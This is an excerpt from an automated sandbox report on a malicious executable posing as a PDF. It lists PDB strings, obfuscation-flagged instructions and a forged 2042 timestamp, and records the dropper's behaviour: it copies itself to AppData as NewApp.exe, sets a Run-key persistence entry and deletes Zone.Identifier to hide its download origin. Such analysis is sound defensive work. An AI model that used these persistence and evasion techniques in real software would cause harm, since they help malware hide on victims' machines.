                      Source: Binary string: winhttp.pdbn source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbw_ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp
                      Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb4 source: WerFault.exe, 0000000B.00000003.685897028.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb^ source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winnsi.pdbL source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbE3931}\Server source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: NewApp.exe, 00000012.00000002.815630033.0000000001206000.00000004.00000020.sdmp
                      Source: Binary string: fwpuclnt.pdbF source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdbh source: WerFault.exe, 0000001A.00000003.799925426.000000000523B000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697491414.0000000001159000.00000004.00000020.sdmp, NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp, NewApp.exe, 00000013.00000002.816199622.0000000000A02000.00000004.00000020.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\user\AppData\Roaming\NewApp\NewApp.PDB source: NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb[ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp, NewApp.exe, 00000012.00000002.811053031.0000000000D97000.00000004.00000010.sdmp, NewApp.exe, 00000013.00000002.811010579.00000000003C7000.00000004.00000010.sdmp
                      Source: Binary string: psapi.pdb!-0 source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb9\ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697430851.00000000010DF000.00000004.00000020.sdmp
                      Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000B.00000003.685664401.00000000052AE000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: System.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb` source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msasn1.pdbt source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: ml.pdb&& source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: clrjit.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: dhcpcsvc.pdbP source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdb source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: cryptbase.pdb* source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: System.Xml.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb* source: NewApp.exe, 00000012.00000002.815445862.00000000011F5000.00000004.00000020.sdmp
                      Source: Binary string: ore.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp
                      Source: Binary string: System.pdb source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: NewApp.exe, 00000013.00000002.816014888.00000000009F0000.00000004.00000020.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Roaming\NewApp\NewApp.PDBn^ source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000B.00000003.685922840.00000000052A0000.00000004.00000040.sdmp
                      Source: Binary string: rtutils.pdbr source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: psapi.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: .pdb8h source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000B.00000003.685808970.0000000005111000.00000004.00000001.sdmp
                      Source: Binary string: System.Core.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: cldapi.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdbr source: NewApp.exe, 00000013.00000002.814816354.0000000000972000.00000004.00000020.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: mscoreei.pdb source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: onfiguration.pdbrr source: WerFault.exe, 0000000B.00000003.685828894.00000000052BC000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: System.Core.pdb source: WerFault.exe, 0000000B.00000003.685766857.00000000052BB000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbl.* source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697469091.000000000112F000.00000004.00000020.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 0000000B.00000002.705274793.0000000005420000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: A4-058000200390-10-14_REV_pdf.PDBZ source: A4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.696989572.0000000000CF7000.00000004.00000010.sdmp
                      Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 0000000B.00000003.685695043.00000000052A2000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000B.00000003.685707809.00000000052AA000.00000004.00000040.sdmp
                      Source: Binary string: System.ni.pdb source: WerFault.exe, 0000000B.00000003.685836587.0000000005127000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.886941721.00000000053C0000.00000004.00000001.sdmp
                      Source: Binary string: edputil.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp
                      Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000B.00000003.685724502.00000000052B5000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Binary contains a suspicious time stampShow sources
                      Source: initial sampleStatic PE information: 0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E47A push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E685 push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E65C push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9E890 push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9EAEF push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E9EA18 push ds; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E97D59 pushad ; retf 0005h
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_00E99E51 push 00A405CAh; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 0_2_05CE267B pushad ; retf
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AAA1C push es; iretd
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A465E push cs; ret
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AE431 push esi; iretd
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063AB58D push es; ret
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeCode function: 8_2_063A5187 push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 18_2_05FE2678 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 19_2_05632678 pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_04D26BC0 push 5D5F5E5Bh; ret
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3E431 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D35187 push edi; retn 0000h
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_05D3AA1C push es; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06383697 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06386FBC pushad ; retf
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_063833C9 push ecx; iretd
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_0638B1F6 push cs; ret
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeCode function: 24_2_06431B98 push esi; ret
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile created: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeJump to dropped file
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewAppJump to behavior
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run NewAppJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeFile opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\AppData\Roaming\NewApp\NewApp.exeFile opened: C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier read attributes | delete
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exeProcess information set: NOOPENFILEERRORBOX
